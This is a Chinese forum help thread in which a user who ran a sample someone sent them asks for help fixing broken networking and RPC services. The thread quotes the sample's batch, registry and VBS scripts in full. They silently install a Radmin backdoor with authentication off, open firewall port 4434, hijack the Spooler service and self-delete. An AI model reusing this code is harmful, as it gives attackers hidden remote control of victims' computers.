请哪位大侠帮帮忙~~
运行过程序  附件2

附件: uxpay.rar (2009-6-9 10:38:03, 286.09 K)
该附件被下载次数 308

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

日志为空。
样本被启发式扫描报毒，建议通过云安全上报。

奇怪~，好了日志重新放上了。 那个0字节的不要下载~

Network Connections  服务不能启动 属性不可用~

日志没看出什么

网上邻居属性的本地连接全消失问题，去百度关于如何设置恢复显示。

杀毒软件问题，去卸载后重装看情况如何。

其他问题，我就不知道了。

@echo off
sc stop r_server & sc stop radmm
sc delete r_server & sc delete radmm
regedit /s install.reg & ping 127.1 -n 1>nul & del /f /q install.reg
sc stop Spooler & sc config Spooler start= auto
sc config Spooler binPath= "%ProgramFiles%\Internet Explorer\svchost.exe /service"
sc config rpcss depend= Spooler & sc start Spooler
attrib +s +h +r admdll.dll & attrib +s +h +r svchost.exe
del /f /q %0 & exit



Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:e9,d1,48,11,5d,4a,8b,5c,0a,d8,b3,c3,71,91,0c,fd
"Port"=hex:5c,11,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%ProgramFiles%\\Internet Explorer\\svchost.exe"="%ProgramFiles%\\Internet Explorer\\svchost.exe:*:Enabled:svchost.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"4434:TCP"="4434:TCP:*:Enabled:Alerter"

Set lsxq=createobject("wscript.shell")
lsxq.run "install.bat",0
wscript.sleep(1000)
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)


和样本里的 这些 批处理和VBS有关吗

可能吧

你怎么会让那东西运行起来的呢

  是啊~别人发我的~我想试试看威力~就中招解决不了了~现在用虚拟机上的

rpc服务没能启动。

我试着启动那个服务 ~说是指定了循环服务依存  1059错误